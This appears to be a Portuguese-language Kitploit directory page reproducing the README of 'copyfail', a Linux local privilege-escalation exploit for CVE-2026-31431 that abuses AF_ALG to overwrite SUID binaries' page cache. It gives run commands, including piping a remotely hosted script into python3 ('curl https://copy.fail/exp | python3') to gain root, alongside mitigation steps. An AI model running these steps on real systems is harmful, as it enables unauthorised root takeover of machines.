Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
copyfail — Exploit local de escalonamento de privilégios no Linux para CVE-2026-31431, sobrescrevendo o page cache de binários SUID através da API de criptografia do kernel AF_ALG para obter acesso root. | Kitploit
Ferramentas/GitHubGitHub/minime794/copyfail
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Binários
GitHubminime794/copyfail

copyfail

Exploit local de escalonamento de privilégios no Linux para CVE-2026-31431, sobrescrevendo o page cache de binários SUID através da API de criptografia do kernel AF_ALG para obter acesso root.

Ver Repositório
há 6h 40mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Copy Fail (CVE-2026-31431) – Guia de Uso do Exploit

Readme Original retirado de @painoob

Todas as versões de Kernel desde 2017 / 2016 são vulneráveis ! Kernel 7 é totalmente imune, outras (entre 5-7 podem ainda ser vulneráveis)

⚠️ Aviso Legal

Este conteúdo é apenas para fins educacionais e de testes de segurança autorizados. NÃO execute isto em sistemas sem permissão explícita.


📌 Visão Geral

Copy Fail (CVE-2026-31431) é uma vulnerabilidade de Escalação de Privilégios Local (LPE) no Linux que afeta a API de criptografia do kernel via AF_ALG.

Permite que um usuário sem privilégios sobrescreva dados do page cache de um binário SUID (por exemplo, /usr/bin/su) e obtenha acesso root.


🧠 Requisitos

Requisitos de Sistema

  • Kernel Linux (vulnerável – depende do status do patch)
  • AF_ALG habilitado
  • Módulo algif_aead carregado

Requisitos do Exploit em Python

  • Python 3.10+
  • Suporte para:
    • os.splice
    • socket(AF_ALG)

🔍 Verificando a Vulnerabilidade

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Indicadores esperados:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead carregado

🐍 Executando o Exploit em Python

1. Executar diretamente

root@kitploit:~
python3 copy_fail_exp.py

2. Ou via curl (se hospedado remotamente)

root@kitploit:~
curl https://copy.fail/exp | python3

3. Acionar shell root

root@kitploit:~
su
id

Resultado esperado:

root@kitploit:~
uid=0(root)

⚠️ Problemas Comuns (Python)

❌ Erro: os.splice not found

Causa:

  • Versão do Python < 3.10
  • Build restrito

Solução:

  • Use um binário Python mais recente
  • Envie um interpretador Python estático

⚙️ Compilando a Versão em C

1. Compilar

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. Tornar executável

root@kitploit:~
chmod +x copy_fail

3. Executar o exploit

root@kitploit:~
./copy_fail
su

⚠️ Problemas Comuns (C)

❌ O exploit executa mas não obtém root

Causas possíveis:

  • Kernel corrigido
  • Offsets incorretos
  • Incompatibilidade de ambiente

❌ Erros de compilação

Instale as ferramentas necessárias:

root@kitploit:~
apt update && apt install build-essential

🧪 Solução de Problemas

Verificar se o sistema está corrigido

root@kitploit:~
dmesg | grep -i alg

Verificar o módulo

root@kitploit:~
lsmod | grep algif_aead

🛡️ Mitigação

Desabilitar o módulo vulnerável

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Aplicar o patch do kernel

Atualize seu sistema:

root@kitploit:~
apt update && apt upgrade

📌 Notas

  • O exploit modifica apenas o page cache (não persistente)
  • Requer acesso local
  • Não é explorável remotamente por padrão

🧠 Consideração Final

Se o exploit falhar, considere:

  • Kernel já corrigido
  • Restrições de ambiente
  • Vetores alternativos de escalação de privilégios (SUID, capabilities, configuração incorreta do sudo)

📚 Referências

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 Notas do Autor

Use este exploit com responsabilidade apenas em laboratórios, CTFs e pentests autorizados.

Baixar ferramenta